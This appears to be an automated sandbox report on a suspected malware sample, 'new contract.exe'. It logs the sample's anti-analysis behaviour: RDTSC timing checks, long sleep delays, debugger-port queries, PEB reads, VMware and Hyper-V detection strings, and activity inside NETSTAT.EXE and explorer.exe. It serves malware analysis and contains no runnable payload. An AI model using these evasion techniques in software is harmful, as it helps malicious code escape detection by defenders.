Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\new contract.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\new contract.exe RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 519904 second address: 51990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 519B6E second address: 519B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: 1490000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: 2F50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: 4F50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: 9030000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: A030000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: A230000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: B230000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00409AA0 rdtsc 2_2_00409AA0
Source: C:\Users\user\Desktop\new contract.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 6573
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 3365
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 888
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 859
Source: C:\Windows\SysWOW64\NETSTAT.EXE Window / User API: threadDelayed 5994
Source: C:\Windows\SysWOW64\NETSTAT.EXE Window / User API: threadDelayed 3978
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\new contract.exe API coverage: 1.7 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE API coverage: 2.0 %
Source: C:\Users\user\Desktop\new contract.exe TID: 7444 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 8076 Thread sleep count: 6573 > 30
Source: C:\Windows\explorer.exe TID: 8076 Thread sleep time: -13146000s >= -30000s
Source: C:\Windows\explorer.exe TID: 8076 Thread sleep count: 3365 > 30
Source: C:\Windows\explorer.exe TID: 8076 Thread sleep time: -6730000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 Thread sleep count: 5994 > 30
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 Thread sleep time: -11988000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 Thread sleep count: 3978 > 30
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 Thread sleep time: -7956000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: explorer.exe, 00000003.00000000.1754990382.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000003.00000000.1754990382.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.4138853699.000000000997A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000002.4138853699.000000000997A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000002.4133315277.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000003.00000002.4137532531.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\new contract.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\new contract.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0040ACE0 LdrLoadDll, 2_2_0040ACE0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4164 mov eax, dword ptr fs:[00000030h] 2_2_016F4164
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165656A mov eax, dword ptr fs:[00000030h] 2_2_0165656A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165656A mov eax, dword ptr fs:[00000030h] 2_2_0165656A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628550 mov eax, dword ptr fs:[00000030h] 2_2_01628550
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628550 mov eax, dword ptr fs:[00000030h] 2_2_01628550
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h] 2_2_0164E53E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h] 2_2_0164E53E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h] 2_2_0164E53E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h] 2_2_0164E53E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h] 2_2_0164E53E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B6500 mov eax, dword ptr fs:[00000030h] 2_2_016B6500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016225E0 mov eax, dword ptr fs:[00000030h] 2_2_016225E0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C5ED mov eax, dword ptr fs:[00000030h] 2_2_0165C5ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C5ED mov eax, dword ptr fs:[00000030h] 2_2_0165C5ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E5CF mov eax, dword ptr fs:[00000030h] 2_2_0165E5CF
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E5CF mov eax, dword ptr fs:[00000030h] 2_2_0165E5CF
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016265D0 mov eax, dword ptr fs:[00000030h] 2_2_016265D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0165A5D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0165A5D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h] 2_2_016A05A7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h] 2_2_016A05A7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h] 2_2_016A05A7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016445B1 mov eax, dword ptr fs:[00000030h] 2_2_016445B1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016445B1 mov eax, dword ptr fs:[00000030h] 2_2_016445B1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01622582 mov eax, dword ptr fs:[00000030h] 2_2_01622582
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01622582 mov ecx, dword ptr fs:[00000030h] 2_2_01622582
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01654588 mov eax, dword ptr fs:[00000030h] 2_2_01654588
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E59C mov eax, dword ptr fs:[00000030h] 2_2_0165E59C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AC460 mov ecx, dword ptr fs:[00000030h] 2_2_016AC460
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h] 2_2_0164A470
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h] 2_2_0164A470
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h] 2_2_0164A470
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h] 2_2_0165E443
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DA456 mov eax, dword ptr fs:[00000030h] 2_2_016DA456
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161645D mov eax, dword ptr fs:[00000030h] 2_2_0161645D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164245A mov eax, dword ptr fs:[00000030h] 2_2_0164245A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h] 2_2_0161E420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h] 2_2_0161E420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h] 2_2_0161E420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161C427 mov eax, dword ptr fs:[00000030h] 2_2_0161C427
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h] 2_2_016A6420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01658402 mov eax, dword ptr fs:[00000030h] 2_2_01658402
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01658402 mov eax, dword ptr fs:[00000030h] 2_2_01658402
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01658402 mov eax, dword ptr fs:[00000030h] 2_2_01658402
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016204E5 mov ecx, dword ptr fs:[00000030h] 2_2_016204E5
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016264AB mov eax, dword ptr fs:[00000030h] 2_2_016264AB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016544B0 mov ecx, dword ptr fs:[00000030h] 2_2_016544B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AA4B0 mov eax, dword ptr fs:[00000030h] 2_2_016AA4B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DA49A mov eax, dword ptr fs:[00000030h] 2_2_016DA49A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628770 mov eax, dword ptr fs:[00000030h] 2_2_01628770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 mov eax, dword ptr fs:[00000030h] 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165674D mov esi, dword ptr fs:[00000030h] 2_2_0165674D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165674D mov eax, dword ptr fs:[00000030h] 2_2_0165674D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165674D mov eax, dword ptr fs:[00000030h] 2_2_0165674D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620750 mov eax, dword ptr fs:[00000030h] 2_2_01620750
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662750 mov eax, dword ptr fs:[00000030h] 2_2_01662750
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662750 mov eax, dword ptr fs:[00000030h] 2_2_01662750
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AE75D mov eax, dword ptr fs:[00000030h] 2_2_016AE75D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A4755 mov eax, dword ptr fs:[00000030h] 2_2_016A4755
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C720 mov eax, dword ptr fs:[00000030h] 2_2_0165C720
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C720 mov eax, dword ptr fs:[00000030h] 2_2_0165C720
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165273C mov eax, dword ptr fs:[00000030h] 2_2_0165273C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165273C mov ecx, dword ptr fs:[00000030h] 2_2_0165273C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165273C mov eax, dword ptr fs:[00000030h] 2_2_0165273C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169C730 mov eax, dword ptr fs:[00000030h] 2_2_0169C730
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C700 mov eax, dword ptr fs:[00000030h] 2_2_0165C700
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620710 mov eax, dword ptr fs:[00000030h] 2_2_01620710
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01650710 mov eax, dword ptr fs:[00000030h] 2_2_01650710
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016427ED mov eax, dword ptr fs:[00000030h] 2_2_016427ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016427ED mov eax, dword ptr fs:[00000030h] 2_2_016427ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016427ED mov eax, dword ptr fs:[00000030h] 2_2_016427ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AE7E1 mov eax, dword ptr fs:[00000030h] 2_2_016AE7E1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016247FB mov eax, dword ptr fs:[00000030h] 2_2_016247FB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016247FB mov eax, dword ptr fs:[00000030h] 2_2_016247FB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0162C7C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A07C3 mov eax, dword ptr fs:[00000030h] 2_2_016A07C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016207AF mov eax, dword ptr fs:[00000030h] 2_2_016207AF
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D47A0 mov eax, dword ptr fs:[00000030h] 2_2_016D47A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C678E mov eax, dword ptr fs:[00000030h] 2_2_016C678E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E866E mov eax, dword ptr fs:[00000030h] 2_2_016E866E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E866E mov eax, dword ptr fs:[00000030h] 2_2_016E866E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A660 mov eax, dword ptr fs:[00000030h] 2_2_0165A660
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A660 mov eax, dword ptr fs:[00000030h] 2_2_0165A660
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01652674 mov eax, dword ptr fs:[00000030h] 2_2_01652674
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163C640 mov eax, dword ptr fs:[00000030h] 2_2_0163C640
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163E627 mov eax, dword ptr fs:[00000030h] 2_2_0163E627
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01656620 mov eax, dword ptr fs:[00000030h] 2_2_01656620
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01658620 mov eax, dword ptr fs:[00000030h] 2_2_01658620
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162262C mov eax, dword ptr fs:[00000030h] 2_2_0162262C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E609 mov eax, dword ptr fs:[00000030h] 2_2_0169E609
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163260B mov eax, dword ptr fs:[00000030h] 2_2_0163260B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662619 mov eax, dword ptr fs:[00000030h] 2_2_01662619
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0169E6F2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0169E6F2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0169E6F2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0169E6F2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A06F1 mov eax, dword ptr fs:[00000030h] 2_2_016A06F1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A06F1 mov eax, dword ptr fs:[00000030h] 2_2_016A06F1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0165A6C7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0165A6C7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0165C6A6
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016566B0 mov eax, dword ptr fs:[00000030h] 2_2_016566B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624690 mov eax, dword ptr fs:[00000030h] 2_2_01624690
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624690 mov eax, dword ptr fs:[00000030h] 2_2_01624690
